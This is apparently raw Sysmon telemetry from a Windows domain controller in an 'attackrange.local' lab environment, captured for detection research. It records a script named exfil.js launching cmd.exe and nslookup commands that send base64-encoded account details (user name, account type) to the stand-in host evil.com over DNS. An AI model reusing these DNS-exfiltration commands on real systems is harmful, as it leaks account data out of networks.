14:16:45.263{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.261{2E1864BB-17CD-629A-F741-000000005F02}5440C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnaenk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.257{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhru.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.194{2E1864BB-17CD-629A-F541-000000005F02}72323568C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-F641-000000005F02}2736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.179{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-F641-000000005F02}2736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.179{2E1864BB-17CD-629A-F441-000000005F02}43443724C:\Windows\system32\cmd.exe{2E1864BB-17CD-629A-F641-000000005F02}2736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.183{2E1864BB-17CD-629A-F641-000000005F02}2736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CD-629A-F441-000000005F02}4344C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhru.tmp 2>&1 10341000x8000000000000000204150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.157{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-F541-000000005F02}7232C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.157{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-F541-000000005F02}7232C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.141{2E1864BB-17CD-629A-F541-000000005F02}72323568C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-F441-000000005F02}4344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.126{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-F541-000000005F02}7232C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.110{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-F441-000000005F02}4344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.110{2E1864BB-17A1-629A-783D-000000005F02}55527024C:\Windows\System32\WScript.exe{2E1864BB-17CD-629A-F441-000000005F02}4344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.110{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.110{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.110{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.110{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.117{2E1864BB-17CD-629A-F441-000000005F02}4344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhru.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.110{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldoj.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.063{2E1864BB-17CC-629A-F241-000000005F02}6086604C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-F341-000000005F02}216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.063{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.063{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.063{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.063{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.063{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-F341-000000005F02}216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.063{2E1864BB-17CC-629A-F141-000000005F02}39646072C:\Windows\system32\cmd.exe{2E1864BB-17CD-629A-F341-000000005F02}216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.067{2E1864BB-17CD-629A-F341-000000005F02}216C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CC-629A-F141-000000005F02}3964C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldoj.tmp 2>&1 10341000x8000000000000000204130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 